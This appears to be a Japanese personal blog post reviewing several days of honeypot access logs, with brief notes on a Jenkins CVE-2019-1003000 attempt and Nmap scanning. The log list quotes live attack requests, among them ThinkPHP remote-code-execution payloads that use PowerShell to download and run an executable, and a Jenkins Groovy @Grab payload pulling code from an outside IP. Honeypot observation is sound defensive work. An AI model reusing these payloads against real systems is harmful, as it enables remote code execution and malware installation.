現実逃避

現実逃避するブログ

ハニーポットログ観察3-3

honeypot セキュリティ

5/5~5/9までのログを見ていきたいと思います。

アクセス先

GET /console/login/LoginForm.jsp
GET http://www.google.com/intl/zh-CN/
GET /acadmin.php
GET http://[]/testget?q=23333&port=80 *1
GET /w00tw00t.at.blackhats.romanian.anti-sec:)
GET /public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('[]/download.exe','C:/Windows/temp/qkkhbrukxwmomfv21893.exe');start%20C:/Windows/temp/qkkhbrukxwmomfv21893.exe  *2
GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('[]/download.exe','C:/Windows/temp/qkkhbrukxwmomfv21893.exe');start%20C:/Windows/temp/qkkhbrukxwmomfv21893.exe
GET /js/preload/example.txt
GET /cgi-bin
GET /admin-scripts.asp
GET /2/wp-login.php
GET /3/wp-login.php
GET /wordpress/wp-login.php
GET /wp1/wp-login.php
GET /wp-login.php
GET ///?author=1
GET ///wp-json/wp/v2/users/
GET /struts2-rest-showcase/orders.xhtml
GET /index.action  //ソースコード付
GET /TP/public/index.php
GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
GET /nmaplowercheck1557288129
GET /NmapUpperCheck1557288129
GET /Nmap/folder/check1557288129
GET /evox/about
GET /HNAP1
GET /struts2-rest-showcase/orders.xhtml
GET /index.action
GET /index.do
GET http[:]//www.sbjudge3.com/azenv.php
GET /js/preload/example.txt
GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27LFZQExtWuxjVTXjsqGnebQq%27,%20root=%27http[:]//185.162.235[.]211%27)%0a@Grab(group=%27package%27,%20module=%27LFZQExtWuxjVTXjsqGnebQq%27,%20version=%271%27)%0aimport%20LFZQExtWuxjVTXjsqGnebQq;
GET /device.rsp?opt=user&cmd=list
GET /device.rsp?opt=user&cmd=list
POST /3/xmlrpc.php

POST /TP/public/index.php?s=captcha
POST /users?page=&size=5
POST /sdk  *3
POST /2/xmlrpc.php
POST /xmlrpc.php
POST /wp1/xmlrpc.php
POST /3/xmlrpc.php



HEAD /
HEAD HEAD http[:]//112.124.42[.]80:63435//robots.txt


CONNECT www.netflix.com:443

virus total: 1 VirusTotal

2 VirusTotal

code 3(サイトは無害) <soap:Envelope xmlns:xsd="http[:]//www.w3.org/2001/XMLSchema" xmlns:xsi="http[:]//www.w3.org/2001/XMLSchema-instance" xmlns:soap="http[:]//schemas.xmlsoap.org/soap/envelope/"><soap:Header>00000001-00000001</soap:Header><soap:Body><this xsi:type="ManagedObjectReference" type="ServiceInstance">ServiceInstance</this></soap:Body></soap:Envelope>



考察

1.GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile~

Jenkinsの脆弱性をついた攻撃 Jenkinsとは Jenkins - Wikipedia

CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1003000

ユーザーが未認証のGETリクエストを発行してGroovyメタプログラミング入力を送ることができる。 このサイトに詳しく書いてある。 https://0xdf.gitlab.io/2019/02/27/playing-with-jenkins-rce-vulnerability.html

2.POST /sdk

Nmapによるポートスキャン

感想

新しい物について触れているので今回は内容浅めです。 新しい物がでてきたらそれについての記事を書いてみようかなと思います。